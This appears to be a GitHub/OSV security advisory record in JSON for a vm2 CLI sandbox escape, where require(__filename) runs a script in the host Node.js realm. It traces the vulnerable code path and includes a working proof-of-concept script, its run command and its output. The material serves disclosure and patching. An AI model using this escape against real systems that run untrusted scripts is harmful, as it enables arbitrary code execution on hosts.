{"id":"GHSA-jxxv-8r27-vm4p","summary":"vm2 CLI provides no sandbox isolation - host-realm require() is reachable from sandboxed scripts","details":"### Summary\nThe `vm2` command-line tool installed by `npm install -g vm2` and documented in the README's \"CLI\" section runs the supplied script under `NodeVM` with `require:{external:true}` and no `root` / `context` / `builtin` configured. With these defaults the resolver loads every relative or absolute `require()` target through the **host** `require()` function, executing the attacker's module body in the host Node.js process before the result is ever proxied back into the sandbox. A single attacker-controlled file passed to `vm2 ./script.js` can call `require(__filename)` to re-execute itself in host realm and reach `fs`, `child_process`, etc. The documented sandbox runner is therefore equivalent to `node ./script.js`. No additional files, flags, or user interaction are required.\n\n### Details\nThe vulnerability lets a **malicious sandboxed script** - the file argument to the documented `vm2 \u003cfile\u003e` CLI - execute arbitrary code in the **host Node.js process**, crossing the sandbox → host boundary that vm2 is meant to enforce.\n\n#### Vulnerable code path\n\n1. **Source** - `bin/vm2:3` → `lib/cli.js:7-18`. `process.argv[2]` is the\n   attacker-authored script path. The CLI invokes:\n   ```js\n   NodeVM.file(path, { verbose: true, require: { external: true } });\n   ```\n   Without `require.root`, `require.context`, nor `require.builtin`.\n2. **Hop** - `lib/nodevm.js:618-636`. `NodeVM.file` reads the file and calls\n   `new NodeVM(options).run(body, resolvedFilename)`.\n3. **Hop** - `lib/nodevm.js:335` → `lib/resolver-compat.js:205-266`\n   (`makeResolverFromLegacyOptions`). Destructures `external:true`,\n   `rootPaths=undefined`, `hostRequire=defaultRequire` (line 218),\n   `context='host'` (default, line 219). Because `typeof externalOpt !== 'object'`\n   (line 265) it returns a `CustomResolver` with `checkedRootPaths=undefined` and\n   `pathContext = () =\u003e 'host'` (line 263).\n4. **Hop** - `lib/setup-node-sandbox.js:86-123` (`requireImpl`). Sandbox\n   `require(id)` resolves via `resolver.resolve(...)` (`lib/nodevm.js:380-383`).\n   `lib/resolver.js:244-275` handles absolute/relative specifiers; `tryFile` at\n   `lib/resolver.js:327-329` gates on `this.isPathAllowed(x)`.\n5. **Barrier (gap)** - `lib/resolver-compat.js:53-54`:\n   ```js\n   isPathAllowed(filename) {\n       if (this.rootPaths === undefined) return true;\n   ```\n   With no `root` configured, **every** filesystem path is allowed. `checkAccess`\n   (`lib/resolver.js:39-42`) delegates to the same method.\n6. **Sink** - `lib/resolver-compat.js:74-77`:\n   ```js\n   loadJS(vm, mod, filename) {\n       if (this.pathContext(filename, 'js') !== 'host') return super.loadJS(...);\n       const m = this.hostRequire(filename);   // ← host-realm require()\n       mod.exports = vm.readonly(m);\n   }\n   ```\n   `hostRequire` is `defaultRequire` (`lib/resolver-compat.js:20-23`) - the real\n   host `require()`. The required module's **top-level body executes in the host\n   realm** before `vm.readonly()` wraps the exports; wrapping happens too late to\n   constrain side-effects. `loadNode` (`lib/resolver-compat.js:80-83`) is\n   identical for `.node` native addons (`process.dlopen` in host).\n\n### PoC\nSave the following as `/tmp/poc.js`:\n\n```js\n'use strict';\ntry {\n    // Host realm: fs is available - write sentinel and stop.\n    const fs = require('fs');\n    fs.writeFileSync('/tmp/vm2.proof', 'host pid=' + process.pid + '\\n');\n    console.log('HOST realm: wrote /tmp/vm2.proof');\n} catch (e) {\n    // Sandbox realm: require('fs') threw ENOTFOUND. Re-require this file -\n    // the CLI resolver loads it via host require() (resolver-compat.js:76).\n    console.log('sandbox realm: fs blocked (' + e.message + '); escaping');\n    require(__filename);\n}\n```\n\nRun via the shipped CLI exactly as the README documents:\n\n```sh\nnode ./bin/vm2 /tmp/poc.js        # or `vm2 /tmp/poc.js` after `npm i -g vm2`\n```\n\nObserved output:\n\n```\nsandbox realm: fs blocked (Cannot find module 'fs'); escaping\nHOST realm: wrote /tmp/vm2.proof\n```\n\n`/tmp/vm2.proof` exists, written by `fs.writeFileSync` from a script whose\ndirect `require('fs')` was blocked by the sandbox. The first line proves the\nboundary exists; the second proves it was crossed.\n\n\n### Impact\nA user who follows the README's CLI section and runs `vm2 ./untrusted.js` on an\nattacker-supplied file gets **arbitrary code execution as that user** - the\nsandbox provides no isolation in this configuration. The blast radius is the\nfull host Node.js process: `fs`, `child_process`, `process.dlopen`, network,\nenvironment.","aliases":["CVE-2026-92950"],"modified":"2026-10-01T16:00:05.309413361Z","published":"2026-10-01T15:40:45Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-10-01T15:40:45Z","nvd_published_at":null,"cwe_ids":["CWE-1188","CWE-453","CWE-829"]},"references":[{"type":"WEB","url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-jxxv-8r27-vm4p"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-92950"},{"type":"WEB","url":"https://github.com/patriksimek/vm2/commit/903017c8a1eae9aba947ec854468b48155e79f86"},{"type":"PACKAGE","url":"https://github.com/patriksimek/vm2"},{"type":"WEB","url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.7"},{"type":"WEB","url":"https://www.vulncheck.com/advisories/vm2-before-3.11.7-sandbox-escape-via-cli-require"}],"affected":[{"package":{"name":"vm2","ecosystem":"npm","purl":"pkg:npm/vm2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.11.7"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 3.11.6","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-jxxv-8r27-vm4p/GHSA-jxxv-8r27-vm4p.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}]}